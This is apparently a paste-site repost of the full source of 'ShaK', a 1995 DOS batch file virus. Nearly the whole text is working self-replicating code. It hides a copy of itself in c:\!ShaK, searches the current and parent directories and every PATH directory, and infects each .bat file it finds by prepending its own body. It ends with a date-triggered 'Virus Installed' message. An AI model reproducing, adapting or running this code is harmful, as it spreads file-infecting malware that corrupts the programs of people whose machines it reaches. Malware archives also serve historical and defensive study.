
ShaK - Batch File Virus - Third Issue - October 19, 1995

Mar 14th, 2023
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Batch 1.26 KB | Cybersecurity | 0 0
  1. @goto the_virus
  2. :host_program
  3. :: host would go here
  5. :: --- ShaK -----------
  6. :: The ShaK Batch Virus
  7. :: --- ShaK -----------
  8. @if not '%_ShaK%==' goto ShaK_end
  9. :the_virus ShaK
  10. @if not '%_ShaK%==' goto host_program ShaK
  11. @if '%0==' echo ShaK I'm Trapped - oh no
  12. @if '%0==' goto host_program ShaK
  13. @echo off>nul.ShaK
  14. if '%1=='ShaK goto ShaK_%2
  15. set ShaK=%1 %2 %3 %4 %5 %6 %7 %8 %9
  16. call %0 ShaK rh
  17. set _ShaK=
  18. set ShaK=
  19. %comspec% /e:5000 /c %0 ShaK vir . .. %path%
  20. goto ShaK_end
  21. :ShaK_rh
  22. set _ShaK=uh
  23. %0 %ShaK%
  24. :ShaK_vir
  25. set ShaK=%0
  26. if exist c:\!shak goto ShaK_ser
  27. if exist %0.bat set ShaK=%0.bat
  28. if not exist %ShaK% exit
  29. find "ShaK"<%ShaK%>c:\!ShaK
  30. attrib c:\!ShaK +h
  31. :ShaK_ser
  32. shift%_ShaK%
  33. if '%2==' exit ShaK
  34. for %%a in (%2\*.bat) do call %ShaK% ShaK inf %%a
  35. goto ShaK_ser
  36. :ShaK_inf
  37. find "ShaK"<%3>nul
  38. if not errorlevel 1 goto ShaK_cnt
  39. echo @goto the_virus>c:\ShaK!
  40. echo :host_program>>c:\ShaK!
  41. type %3>>c:\ShaK!
  42. echo.>>c:\ShaK!
  43. type c:\!ShaK>>c:\ShaK!
  44. move c:\ShaK! %3>nul
  45. exit ShaK
  46. :ShaK_cnt
  47. set ShaKcnt=%ShaKcnt%1
  48. if %ShaKcnt%==1111111111111111 exit
  49. if not %ShaKcnt%==111 goto ShaK_end
  50. echo.|date|find "30">nul.ShaK
  51. if errorlevel 1 goto ShaK_end
  52. echo *** ShaK.Bat.Virus Installed ***
  53. echo Keep me around for your friends!%_ShaK%
  54. :ShaK_end
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